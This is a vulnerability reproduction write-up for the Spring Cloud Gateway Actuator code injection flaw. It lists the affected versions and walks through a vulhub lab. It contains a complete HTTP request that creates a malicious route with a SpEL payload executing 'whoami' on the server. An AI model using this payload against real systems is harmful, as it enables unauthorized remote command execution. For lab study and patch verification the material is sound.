Table of contents
Disclaimer: This article is for learning and reference only. All resources involved in it are from the Internet. Please do not use them for any illegal acts, otherwise you will bear the corresponding consequences yourself, and I do not assume any legal and joint and several liabilities.
Vulnerability description
Applications using Spring Cloud Gateway are vulnerable to code injection when the Actuator endpoint is enabled, exposed, and insecure. An attacker can maliciously craft requests that allow arbitrary remote execution on a remote host.
When an attacker has access to the actuator API, the vulnerability can be exploited to execute arbitrary commands.
Sphere of influence
Spring Cloud Gateway < 3.1.1
Spring Cloud Gateway < 3.0.7
Spring Cloud Gateway Other versions that are no longer updated
Environment build
Vulnerability environment construction, using vulhub, construction method, self-search.
After building successfully, visit
Vulnerability recurrence
- Check that the actuator endpoint is enabled
Capture packets and modify the interface to /actuator
2. View /actuator/gateway/routes
The returned routing information means that when accessing index, it is routed to http://example.com:80
- create route
POST /actuator/gateway/routes/test HTTP/1.1
Host: 192.168.10.171:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 17 Oct 2019 07:18:26 GMT
If-None-Match: "3147526947"
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 431
{
"id": "test",
"filters": [
{
"name": "AddResponseHeader",
"args": {
"value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}",
"name": "cmd"
}
}
],
"uri": "http://example.com:80",
"order": 0
}
4. Refresh routing
5. Access the created route
6. Delete route
7. Refresh the route again
8. Then, visit the route and find that the route has been deleted